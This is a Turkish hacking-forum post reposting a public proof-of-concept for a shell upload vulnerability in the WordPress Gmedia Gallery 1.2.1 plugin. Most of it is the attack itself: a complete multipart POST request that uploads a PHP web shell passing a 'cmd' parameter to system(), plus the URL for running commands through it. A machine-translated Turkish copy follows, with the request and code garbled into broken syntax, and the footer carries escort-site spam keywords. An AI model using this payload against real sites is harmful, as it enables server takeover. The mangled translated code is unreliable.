Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability

Holigano

Forumdan Uzaklaştırıldı
Katılım
2 May 2015
Mesajlar
560
Tepkime puanı
0
Puanları
0
Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability

Kod:
# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.codeasily.com/
 
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip
 
# Date : 2014-08-01
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Description : 
 
Any user could upload php files (administrator by default).
 
######################
 
# Vulnerability Disclosure Timeline:
 
2014-08-01:  Discovered vulnerability
2014-08-01:  Vendor Notification (Twitter)
2014-08-01:  Vendor Response/Feedback
2014-08-02:  Vendor Fix/Patch
2014-08-02:  Public Disclosure
 
######################
 
# PoC:
 
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia
Content-Length=916
Content-Type=multipart/form-data; boundary=---------------------------304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------304431219031197
Content-Disposition: form-data; name="name"
 
.shell.php
-----------------------------304431219031197
Content-Disposition: form-data; name="chunk"
 
0
-----------------------------304431219031197
Content-Disposition: form-data; name="chunks"
 
1
-----------------------------304431219031197
Content-Disposition: form-data; name="params"
 
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=
-----------------------------304431219031197
Content-Disposition: form-data; name="file"; filename=".shell.php"
Content-Type: application/octet-stream
 
<?php
 
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
 
?>
 
 
 
-----------------------------304431219031197--
 
 
Backdoor location:
 
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd


Türkçe

Kod:
# Başlık Exploit: Wordpress Gmedia Galeri Shell Upload Güvenlik Açığı 1.2.1 
 
# Yazar Exploit: Claudio Viviani 
 
# Satıcı Web Sitesi: http://www.codeasily.com/ 
 
# Yazılım Link: http://downloads.wordpress.org/plugin/grand-media.zip 
 
# Tarih: 2014/08/01 
 
Windows 7 / Mozilla Firefox: # üzerinde test edilmiştir 
 
###################### 
 
# Açıklama: 
 
Herhangi bir kullanıcı php dosyalarını (varsayılan olarak yönetici) yükleyebilir. 
 
###################### 
 
# Güvenlik Açığı Bilgilendirme Timeline: 
 
2014/08/01: Discovered açığı 
2014/08/01: Satıcı Bildirim (Twitter) 
2014/08/01: Satıcı Tepki / Geri Bildirim 
2014/08/02: Satıcı Fix / Patch 
2014/08/02: Kamuyu Aydınlatma 
 
###################### 
 
# PoC: 
 
POST 
= 127.0.0.1 ev sahipliği 
User-Agent = Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 31.0) Gecko / 20100101 Firefox / 31,0 
Kabul = text / html, application / xhtml + xml, uygulama / xml; q = 0.9, * / *, q = 0.8 
Accept-Language = it-IT, o; q = 0.8, en-US; q = 0.5, tr, q = 0.3 
Accept-Encoding = gzip, deflate 
Referans = http:? //127.0.0.1/wordpress/wp-Admin/admin.php sayfa = GrandMedia_AddMedia 
İçerik-Uzunluk = 916 
Content-Type = multipart / form-data; sınır = --------------------------- 304431219031197 
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da;  wordpress_test_cookie = WP + Çerez + kontrol edin;  wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7;  wp-ayarları-time-1 = 1406915840 
Bağlantı = canlı tutma 
Pragma = no-cache 
Cache-Control no-cache = 
PostData = ----------------------------- 304431219031197 
Content-Disposition: form-data; = "isim" adı 
 
.shell.php 
----------------------------- 304431219031197 
Content-Disposition: form-data; name = "yığın" 
 
0 
----------------------------- 304431219031197 
Content-Disposition: form-data; name = "topakları" 
 
1 
----------------------------- 304431219031197 
Content-Disposition: form-data; name = "params" 
 
terimler% 5Bgmedia_category% 5D = & terimler% 5Bgmedia_album% 5D = & terimler% 5Bgmedia_tag% 5D = 
----------------------------- 304431219031197 
Content-Disposition: form-data; = "file" adını; filename = ". shell.php" 
Content-Type: application / octet-stream 
 
<? php 
 
if (isset ($ _ İSTEK) ['cmd']) {
         "<pre> echo"; 
         $ cmd = ($ _REQUEST ['cmd']); 
         sistemi ($ cmd); 
         echo "</ pre>"; 
         die; 
} 
 
?> 
 
 
 
----------------------------- 304431219031197-- 
 
 
Backdoor konumu: 
 
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort
Üst
Copyright® Ajanlar.org 2012